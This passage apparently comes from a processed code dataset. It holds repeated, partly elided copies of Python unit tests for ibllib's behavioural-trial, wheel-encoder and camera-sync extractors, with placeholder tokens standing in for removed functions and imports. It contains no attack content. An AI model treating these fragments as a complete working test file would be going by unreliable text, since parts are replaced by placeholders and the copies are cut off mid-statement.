=0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 
9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n 
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def 
test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n 
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 
'some_file.ssv',\n        'some_file.npy')\n    var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n    def _extract(self, **kwargs) ->tuple:\n        csv = pd.DataFrame([1, 2, 3])\n        ssv = pd.DataFrame([1, 2, 3])\n        tsv = pd.DataFrame([1, 2, 3])\n        npy = np.array([1, 2, 3])\n        return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n    def setUp(self) ->None:\n        self.tempdir = tempfile.TemporaryDirectory()\n        self.session_path = self.tempdir.name\n        self.mock_extractor = MockExtracor(self.session_path)\n\n    def test_saving_method(self):\n        data, paths = self.mock_extractor.extract(save=True)\n        self.assertTrue(all([x.exists() for x in paths]))\n\n    def tearDown(self):\n        self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n    def test_groom_pin_state(self):\n        fps = 60\n        t_offset = 39.4\n        ts = np.arange(0, 10, 1 / fps) + t_offset\n        ts += np.full_like(ts, 0.0001).cumsum()\n        n_pulses = 2\n        pulse_width = 0.3\n        duty = 0.5\n        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n            'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n        gpio['polarities'][1::2] = -1\n        aud_offset = 40.0\n        audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n            'polarities']}\n        for p in range(n_pulses):\n            i = p * 2\n            rise = pulse_width * p + duty * p + 1\n            audio['times'][i] = aud_offset + rise\n            audio['times'][i + 1] = audio['times'][i] + pulse_width\n            rise += t_offset\n            gpio['indices'][i] = np.where(ts > rise)[0][0]\n            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n        self.assertEqual(audio, audio_, \"Audio dict shouldn't be affected\")\n        np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n            40.033333, 40.05])\n        delay = 0.08\n        pulse_width = 1e-05\n        t = audio['times'][0] + delay\n        audio['times'] = np.sort(np.append(audio['times'], [t, t +\n            pulse_width, 80]))\n        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n        audio['polarities'][1::2] = -1\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n            =0.005)\n        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n        audio['times'][4] -= 0.3\n        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n            tolerance=0.1, min_diff=0.005)\n        self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n        self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n    def test_attribute_times(self, display=False):\n        tsa = np.linspace(0, 60, 60 * 4)[:60]\n        tsb = np.linspace(0, 60, 60 * 3)[:45]\n        tsa = np.sort(np.append(tsa, 0.4))\n        tsb = np.sort(np.append(tsb, 0.41))\n        if display:\n            from ibllib.plots import vertical_lines\n            import matplotlib.pyplot as plt\n            vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n            vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n            plt.legend()\n        matches = camera.attribute_times(tsa, tsb)\n        expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n            18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n            40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n        np.testing.assert_array_equal(matches, expected)\n        self.assertEqual(matches.size, tsb.size)\n        matches = camera.attribute_times(tsa, tsb, take='nearest')\n        expected[np.r_[1:3]] = expected[1:3] + 1\n        np.testing.assert_array_equal(matches, expected)\n        matches = camera.attribute_times(tsa, tsb, take='after')\n        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n            25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n        expected[missing] = -1\n        np.testing.assert_array_equal(matches, 
expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n <function token>\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n <function token>\n <function token>\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n 
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n <function token>\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n <function 
token>\n <function token>\n <function token>\n <function token>\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n <function token>\n <function token>\n <function token>\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with 